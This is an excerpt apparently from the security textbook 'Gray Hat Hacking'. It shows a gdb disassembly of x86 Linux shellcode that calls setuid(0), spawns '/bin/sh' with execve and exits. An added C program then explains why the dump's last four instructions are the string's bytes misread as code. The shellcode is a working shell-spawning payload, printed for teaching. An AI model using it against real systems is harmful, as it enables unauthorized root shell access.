
Shon Harris, Allen Harper, Chris Eagle, and Jonathan Ness

"Gray Hat Hacking, Second Edition"

# gdb shellcode
(gdb) x /24i &shellcode
0x8049540 : xor eax,eax
0x8049542 : xor ebx,ebx
0x8049544 : mov al,0x17
0x8049546 : int 0x80
0x8049548 : jmp 0x8049569
0x804954a : pop esi
0x804954b : mov DWORD PTR [esi+8],esi
0x804954e : xor eax,eax
0x8049550 : mov BYTE PTR [esi+7],al
0x8049553 : mov DWORD PTR [esi+12],eax
0x8049556 : mov al,0xb
0x8049558 : mov ebx,esi
0x804955a : lea ecx,[esi+8]
0x804955d : lea edx,[esi+12]
0x8049560 : int 0x80
0x8049562 : xor ebx,ebx
0x8049564 : mov eax,ebx
0x8049566 : inc eax
0x8049567 : int 0x80
0x8049569 : call 0x804954a
0x804956e : das
0x804956f : bound ebp,DWORD PTR [ecx+110]
0x8049572 : das
0x8049573 : jae 0x80495dd
(gdb) x /s 0x804956e
0x804956e : "/bin/sh"
(gdb) quit
#
Note that we can't use the gdb disassemble command, because the shellcode array lies
in the data section of the program rather than the code section.
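The last four lines of the listing (das, bound, das, jae) are not code. They start at 0x804956e, the same address where x /s prints "/bin/sh", so they are the string's bytes decoded as instructions because x /24i keeps sweeping past the call. The following added example (not from the book) reproduces those four lines from the string alone; the function names are hypothetical and the decoder handles only the three opcodes involved.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
static const char *REG32[8] = {"eax","ecx","edx","ebx","esp","ebp","esi","edi"};

/* Decode one instruction at p (address addr); returns its length, 0 if unknown. */
static size_t decode_one(const unsigned char *p, size_t avail, uint32_t addr,
                         char *out, size_t outsz)
{
    if (avail >= 1 && p[0] == 0x2f) { snprintf(out, outsz, "das"); return 1; }
    if (avail >= 3 && p[0] == 0x62) {            /* 62 /r: bound r32,m */
        unsigned mod = p[1] >> 6, reg = (p[1] >> 3) & 7, rm = p[1] & 7;
        if (mod != 1 || rm == 4) return 0;       /* only [reg+disp8], no SIB */
        snprintf(out, outsz, "bound %s,DWORD PTR [%s+%d]",
                 REG32[reg], REG32[rm], (int)(signed char)p[2]);
        return 3;
    }
    if (avail >= 2 && p[0] == 0x73) {            /* 73 cb: jae rel8 */
        snprintf(out, outsz, "jae 0x%x",
                 (unsigned)(addr + 2 + (uint32_t)(int32_t)(signed char)p[1]));
        return 2;
    }
    return 0;
}

/* Linear sweep over buf as if it were code at base; returns instructions decoded. */
int sweep(const unsigned char *buf, size_t len, uint32_t base, char *listing, size_t sz)
{
    size_t off = 0, used = 0;
    int count = 0;
    char insn[64];
    listing[0] = '\0';
    while (off < len) {
        size_t n = decode_one(buf + off, len - off, base + (uint32_t)off, insn, sizeof insn);
        int w = n ? snprintf(listing + used, sz - used, "0x%x : %s\n",
                             (unsigned)(base + off), insn) : -1;
        if (w < 0 || (size_t)w >= sz - used) break;   /* unknown opcode or buffer full */
        used += (size_t)w; off += n; count++;
    }
    return count;
}

int main(void)
{
    const unsigned char str[] = "/bin/sh";  /* string x /s shows at 0x804956e */
    char listing[256];
    int n = sweep(str, strlen((const char *)str), 0x804956e, listing, sizeof listing);
    printf("%d instructions from %zu data bytes:\n%s", n, strlen((const char *)str), listing);
}
```

The seven string bytes are consumed exactly (1 + 3 + 1 + 2), which is why the 24-instruction dump ends on the jae.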

